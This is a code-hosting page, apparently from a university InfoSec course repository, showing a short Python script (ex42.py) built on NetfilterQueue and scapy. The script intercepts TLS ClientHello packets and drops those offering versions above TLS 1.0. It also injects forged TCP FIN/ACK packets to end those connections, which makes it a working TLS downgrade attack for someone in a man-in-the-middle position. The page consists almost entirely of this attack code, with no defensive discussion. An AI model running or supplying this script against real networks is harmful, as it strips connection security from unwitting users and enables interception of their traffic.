Page Menu
Home
c4science
Search
Configure Global Search
Log In
Files
F102769510
ex42.py
No One
Temporary
Actions
Download File
Edit File
Delete File
View Transforms
Subscribe
Mute Notifications
Award Token
Subscribers
None
File Metadata
Details
File Info
Storage
Attached
Created
Mon, Feb 24, 00:32
Size
1 KB
Mime Type
text/x-python
Expires
Wed, Feb 26, 00:32 (1 d, 23 h)
Engine
blob
Format
Raw Data
Handle
24419658
Attached To
R6092 InfoSec
ex42.py
View Options
from
netfilterqueue
import
NetfilterQueue
from
scapy.all
import
*
def
callback
(
pkt
):
shouldDrop
=
False
ip
=
IP
(
pkt
.
get_payload
())
if
ip
.
haslayer
(
Raw
):
data_bytes
=
ip
[
Raw
]
.
load
# First, detect the client hello message
if
data_bytes
[
0
]
==
0x16
and
data_bytes
[
1
]
==
0x03
:
# and data_bytes[5] == 0x01:
# Secondly, drop clientHello if TLS version is higher than 1.0
if
data_bytes
[
1
]
==
0x03
and
data_bytes
[
2
]
>
0x01
:
shouldDrop
=
True
# Finally, terminate the current connection
new_packet
=
IP
(
dst
=
ip
[
IP
]
.
dst
,
src
=
ip
[
IP
]
.
src
)
/
TCP
()
new_packet
[
TCP
]
.
sport
=
ip
[
TCP
]
.
sport
new_packet
[
TCP
]
.
dport
=
ip
[
TCP
]
.
dport
new_packet
[
TCP
]
.
seq
=
ip
[
TCP
]
.
seq
new_packet
[
TCP
]
.
ack
=
ip
[
TCP
]
.
ack
new_packet
[
TCP
]
.
flags
=
'FA'
send
(
new_packet
)
if
shouldDrop
:
pkt
.
drop
()
else
:
pkt
.
accept
()
nfqueue
=
NetfilterQueue
()
nfqueue
.
bind
(
0
,
callback
,
100
)
try
:
nfqueue
.
run
()
except
KeyboardInterrupt
:
print
(
''
)
nfqueue
.
unbind
()
Event Timeline
Log In to Comment